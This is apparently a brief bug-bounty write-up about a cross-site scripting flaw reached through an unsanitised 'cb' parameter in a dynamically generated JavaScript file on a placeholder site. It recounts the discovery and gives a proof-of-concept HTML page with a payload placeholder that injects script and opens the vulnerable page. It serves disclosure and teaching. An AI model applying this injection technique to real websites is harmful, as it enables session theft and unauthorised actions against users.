Xss using dynamically generated js file


Severity : High

Complexity: Medium

Weakness: Disclosing JS endpoint & not sanitizing User Input

— — — — — — — — — — — — — — — — — — — — — — — — — — — —

Discovery :

  • While checking Burp Proxy Request’s I came across following JavaScript file.
https://www.site.com/mvcs/kt/tags/pclntny.js
  • I started brute-forcing for any parameter for JS endpoint and found ?cb=
  • Which Take’s the user input and append it to getScript Calling Function Since the Content type is text/plain. So we Need to Find a Way to Render our Input .
https://www.site.com/mvcs/kt/tags/pclntny.js?cb=xxxxxxxxx
  • We know that JS file’s doesn’t care about SOP & can be access by making cross domain request’s , Luckily there was no X-Content-Sniffing Header aswell .
Now the Task was to Find Where , https://www.site.com/mvcs/kt/tags/pclntny.js js file is being rendered in HTML/Javascript under https://www.site.com/
  • I Used Burp Proxy Search Filter option to look for that endpoint .
Found that it is used in https://www.site.com/user/public/apps/tags?val=pcltny.js
<script type="text/javascript" src="/mvcs/kt/tags/pclntny.js" />.
.
.
.
.
var Doc = uri.queryKey['
cb'];

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Exploitation :

  • Simple POC :
<html>
<body>
<script src="https://www.site.com/mvcs/kt/tags/pclntny.js?cb=xxxx')<PAYLOAD-HERE>;">
...
window.open(https://www.site.com/user/public/apps/tags?val=pcltny.js, '_blank').focus();
</script>
</body>
</html>

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

  • Able to Bypass their Cross domain Policy by injecting AJAX Request’s

Tools: https://github.com/maK-/parameth For checking Parameter’s .

Reference :

Nice and Little Bounty!